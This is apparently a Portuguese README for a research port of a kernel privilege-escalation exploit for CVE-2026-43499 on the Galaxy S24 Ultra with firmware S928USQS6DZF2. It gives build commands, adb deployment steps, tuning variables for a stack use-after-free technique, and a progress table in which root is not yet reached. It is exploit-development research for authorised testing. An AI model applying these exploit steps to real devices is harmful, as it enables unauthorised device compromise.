
Porte de pesquisa da CVE-2026-43499 para Galaxy S24 Ultra SM-S928U1 DZF2 (CONCLUÍDO)
Porte de pesquisa específico do dispositivo para o CVE-2026-43499 no Samsung Galaxy S24 Ultra dos EUA com firmware S928USQS6DZF2 (domínio de aplicativo / caminho de produção).
Este repositório é a contraparte do S24U de
CVE-2026-43499-S25U. Ele
captura o progresso atualmente incompleto: o plano de controle e o
armamento do UAF residual de pilha estão em vigor; uma escrita limpa de gate
(hits>0) ainda não foi alcançada.
Model: SM-S928U1
Codename: e3q
Android: 14 / BP4A.251205.006 (display family)
Build / AP: S928U1UES6DZF2 / S928USQS6DZF2
Fingerprint: samsung/e3qsqw/e3q:14/UP1A.231005.007/S928USQS6DZF2:user/release-keys
Kernel: 6.1.145-android14-11-33419968-abS928USQS6DZF2
Architecture: arm64 / 4K pages
Offsets e layouts se aplicam somente a este firmware. Não transfira constantes entre builds sem evidências.
Bloqueador: geometria residual segura para walk. Um plantio RB_EMPTY
verdadeiro precisa do VA residual do kernel (APP_STAMP_RESIDUAL_ADDR /
APP_STAMP_OVERLAY_BASE). Árvores forjadas e overlays KEEP (que zeram sob
FD_ZERO) causam panic no walk forçado. Veja
docs/PROGRESS.md.
agent/s928u-bp4a-251205-006 (E3Q DZF2)Licença Apache 2.0: LICENSE.
e3q-S928USQS6DZF2 (oráculo físico P0, layout de bank,
geometria de pipe para DZF2).cve-2026-43499-app.so) com
slide_app.c: plantios de stamp residual, soft_match, walk do REPLANT,
walk_nice, NO_PLANT, hooks de plantio EMPTY, bank peek, fiação de drain.O_APPEND (evita sobrescrita de log
entre pai/filho).export ANDROID_NDK_HOME=/path/to/ndk # e.g. r28 / API 34 clang
make -j$(nproc)
# or:
make app API=34
Saídas:
build/e3q-S928USQS6DZF2/cve-2026-43499-app.so
build/e3q-S928USQS6DZF2/cve-2026-43499-root
build/e3q-S928USQS6DZF2/cve-2026-43499 # optional standalone
ADB do Windows (ou adb do host) para o serial R5CXB20H9FD (exemplo de unidade
de pesquisa):
# Prefer the rebuilt helper (O_APPEND logs), not only the APK copy.
adb push build/e3q-S928USQS6DZF2/cve-2026-43499-app.so /data/local/tmp/
adb push build/e3q-S928USQS6DZF2/cve-2026-43499-root /data/local/tmp/
adb shell "run-as dev.busung.s25uroot sh -c '
mkdir -p files/payload-overrides/e3q-S928USQS6DZF2
cp /data/local/tmp/cve-2026-43499-app.so \
files/payload-overrides/e3q-S928USQS6DZF2/
cp /data/local/tmp/cve-2026-43499-root files/
chmod 700 files/cve-2026-43499-root \
files/payload-overrides/e3q-S928USQS6DZF2/cve-2026-43499-app.so
'"
export APP_STACK_UAF_STAMP=1
export APP_STAMP_PLANT=soft
export APP_STAMP_SOFT_MATCH=1
export APP_STAMP_FIXED_SHIFT=2
export APP_BANK_VALID_ROOT=1
export APP_STAMP_STATUS_PATH=/data/user/0/dev.busung.s25uroot/files/stamp_status_last.txt
# run via helper --run-payload ... (see docs/PROGRESS.md)
# After soft_match plant: change residual prio then force task nice change.
export APP_STAMP_REPLANT_WALK=1
export APP_STAMP_WALK_PRIO=100
export APP_STAMP_WALK_NICE=18 # must differ from first nice (default 19)
# Prefer EMPTY bank for some paths; still KP without residual kVA EMPTY plant
Não faça nova varredura dos shifts de plantio 0–4; a base 2 está estabelecida.
| Documento | Conteúdo |
|---|---|
| docs/PROGRESS.md | Matriz de marcos, alegações OBS/SRC, ponto de parada |
| docs/ENV_REFERENCE.md |
Use apenas em dispositivos seus ou para os quais você tenha autorização explícita para testar. Esta árvore é software de pesquisa para um caminho de telefone de produção bloqueado; não é um instalador pronto de root ou do KernelSU.
A integração com o KernelSU está fora do escopo até que existam uma escrita confiável de pipe/phys e um caminho de root. Não trate este repositório como pronto para KSU.
| Etapa | Status |
|---|
| Vazamento mm do KernelSnitch / preparação de página | Funcionando em produção |
| Bank reclaim + MSG_PEEK (owner=1) | Funcionando |
| Armamento clássico de UAF residual de pilha via EDEADLK | Funcionando |
| Plantio de pilha (nfds ≤ 320, shift de base residual=2) | Funcionando |
| Correspondência de saída antecipada @ prio 120 (não 139) | Funcionando |
| Geometria de gravação soft sob saída antecipada | Plantado com segurança; sem walk |
REPLANT + walk_nice forçando o walk adjust_pi | Comprovado; sempre KP até agora |
Oráculo de gate hits>0 | Em aberto |
| Pipe phys-rw / root do Android / KernelSU | Não alcançado |
| Variáveis de ambiente para os caminhos de stamp/bank |
| docs/RUN_HISTORY.md | Histórico condensado de execuções no dispositivo (RUN047–062) |